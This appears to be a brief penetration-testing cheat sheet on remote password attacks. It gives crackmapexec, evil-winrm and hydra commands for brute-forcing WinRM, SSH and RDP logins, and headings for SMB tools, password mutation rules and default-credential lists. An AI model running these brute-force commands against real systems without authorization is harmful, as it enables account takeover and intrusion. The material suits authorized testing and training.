Misc

Remote Password Attacks

WinRM

crackmapexec

$ sudo apt-get -y install crackmapexec
$  crackmapexec <proto> -h
$ crackmapexec winrm <target-ip> -u user.list -p password.list

Evil-WinRM

$ sudo gem install evil-winrm
$ evil-winrm -i <target-ip> -u <username> -p <password>

If the login was successful, a terminal session is initialized using the PowerShell Remoting Protocol.

SSH

$ hydra -L user.list -P password.list ssh://<target-ip>
$ ssh user@<target-ip>

RDP

$ hydra -L user.list -P password.list rdp://<target-ip>
$ xfreerdp /v:<target-IP> /u:<username> /p:<password>

SMB

Hydra (may cause an error if the SMB version3 is running)

Metasploit

Crackmapexec

SMBclient

Password Mutations

Custom rules file

Predefined rules

Spidering the web for a wordlist

Default Creds

Look for credential stuffingarrow-up-right.

Useful default creds cheatsheetarrow-up-right.

Combined wordlist (user:pass)

Router default creds in herearrow-up-right.

Last updated